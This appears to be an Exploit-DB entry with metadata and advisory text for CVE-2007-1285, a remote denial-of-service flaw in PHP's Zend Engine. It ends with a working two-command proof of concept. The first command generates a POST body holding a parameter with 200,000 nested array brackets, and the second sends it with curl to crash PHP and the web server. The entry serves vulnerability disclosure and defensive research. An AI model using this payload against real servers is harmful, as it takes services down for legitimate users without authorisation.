PHP 3/4/5 - ZendEngine Variable Destruction Remote Denial of Service

Author: Stefan Esser
type: dos
platform: php
port: 
date_added: 2007-03-01 
date_updated: 2016-12-02 
verified: 1 
codes: CVE-2007-1285;OSVDB-32769 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphp-5.2.1.tar.gz

source: https://www.securityfocus.com/bid/22764/info

PHP is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input.

An attacker who can run PHP code on a vulnerable computer may exploit this vulnerability to crash PHP and the webserver, denying service to legitimate users.

This issue affects all versions of PHP.

$ php -r 'echo "a".str_repeat("[]",200000)."=1&a=0";' > postdata

$ curl http://www.example.com/ -d @postdata